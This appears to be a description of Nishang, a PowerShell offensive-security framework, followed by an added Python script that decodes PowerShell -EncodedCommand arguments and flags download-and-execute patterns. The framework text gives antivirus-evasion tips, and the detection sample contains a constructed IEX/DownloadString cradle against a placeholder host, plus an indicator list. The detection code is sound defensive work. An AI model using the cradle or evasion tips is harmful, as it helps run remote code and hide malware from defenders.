Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of a penetration test.

Import all the scripts into the current PowerShell session (PowerShell v3 onwards), or use the individual scripts with dot sourcing. Note that since version 0.3.8 the help is available for the function loaded after running the script, not for the script itself. In all cases, the function name is the same as the script name.

Nishang scripts are flagged as malicious by many antivirus products. The scripts on a target are meant to be used in memory, which is very easy to do with PowerShell. There are two basic methods to execute PowerShell scripts in memory. The first is the in-memory download and execute: use the command below to execute a PowerShell script from a remote shell, a meterpreter native shell, a web shell etc., and then call the function exported by it.
Features
- All the scripts in Nishang export a function with the same name in the current PowerShell session
- Use the -encodedcommand (or -e) parameter of PowerShell
- Encode the script using Invoke-Encode from Nishang
- If the scripts still get detected, changing the function and parameter names and removing the help content will help
- Modify AD objects to provide the minimal permissions required for DCShadow
- Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell
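Both in-memory execution methods the page describes (the download-and-execute cradle and the -encodedcommand switch) leave the script text recoverable from process-creation telemetry, because -EncodedCommand is only base64 over UTF-16LE. The following Python is added here as a detection example and is not part of Nishang: it pulls the encoded argument out of sample command lines, decodes it, and grades the result by whether it contains the usual download-and-execute indicators. The sample command lines, the indicator list and the example.invalid URL are constructed assumptions, not real telemetry.

```python
"""Decode PowerShell -EncodedCommand arguments from process command lines and
flag the in-memory download-and-execute pattern.

Added detection example; not part of Nishang. The sample command lines below
are constructed for illustration and are not real telemetry.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# Capture "<switch> <base64 blob>" pairs; the switch is checked separately.
_SWITCH_RE = re.compile(r"[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")

# Substrings defenders commonly alert on in decoded script blocks (assumed list,
# matched against the lower-cased script).
_INDICATOR_RES = {
    "iex": re.compile(r"\biex\b"),
    "invoke-expression": re.compile(r"\binvoke-expression\b"),
    "net.webclient": re.compile(r"\bnet\.webclient\b"),
    "downloadstring": re.compile(r"\.downloadstring\b"),
    "invoke-webrequest": re.compile(r"\binvoke-webrequest\b"),
    "frombase64string": re.compile(r"\bfrombase64string\b"),
}


def to_encoded_command(script: str) -> str:
    """Base64 of the UTF-16LE script, the format -EncodedCommand expects.
    Used only to build the constructed samples and to round-trip the decoder."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str):
    """Return the base64 argument of an -EncodedCommand style switch, or None."""
    for switch, blob in _SWITCH_RE.findall(cmdline):
        s = switch.lower()
        # -ExecutionPolicy, -ep etc. start with "e" but are not prefixes of the switch.
        if s.startswith("e") and "encodedcommand".startswith(s):
            return blob
    return None


def decode_encoded_command(blob: str):
    """Decode the base64/UTF-16LE payload; None if it is not well formed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def find_indicators(script: str):
    """Sorted list of indicator names present in the decoded script."""
    low = script.lower()
    return sorted(name for name, rx in _INDICATOR_RES.items() if rx.search(low))


def analyze_command_line(cmdline: str):
    """None when no encoded command is present; otherwise a graded finding.
    An undecodable blob is still reported: a real -e argument always decodes."""
    blob = extract_encoded_command(cmdline)
    if blob is None:
        return None
    decoded = decode_encoded_command(blob)
    indicators = find_indicators(decoded) if decoded is not None else []
    if decoded is None:
        severity = "undecodable"
    elif indicators:
        severity = "high"
    else:
        severity = "medium"  # encoded but no cradle: review, do not auto-alert
    return {"cmdline": cmdline, "decoded": decoded,
            "indicators": indicators, "severity": severity}


def scan(cmdlines):
    """Findings for every command line that carries an encoded command."""
    return [f for f in (analyze_command_line(c) for c in cmdlines) if f is not None]


# Constructed samples: one plain script run, one download-and-execute cradle,
# one benign encoded admin command, one malformed blob.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -nop -w hidden -e " + to_encoded_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"),
    "powershell.exe -EncodedCommand " + to_encoded_command(
        "Get-Service | Where-Object Status -eq 'Running'"),
    "powershell.exe -enc notbase64!!",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f["severity"], f["indicators"], repr(f["decoded"]))
```

The switch match accepts any prefix of -EncodedCommand rather than the literal string, since the interpreter does the same, and an argument that fails to decode is still reported rather than dropped; in production the input would be the command-line field of process-creation events or PowerShell script block logs rather than the constructed list.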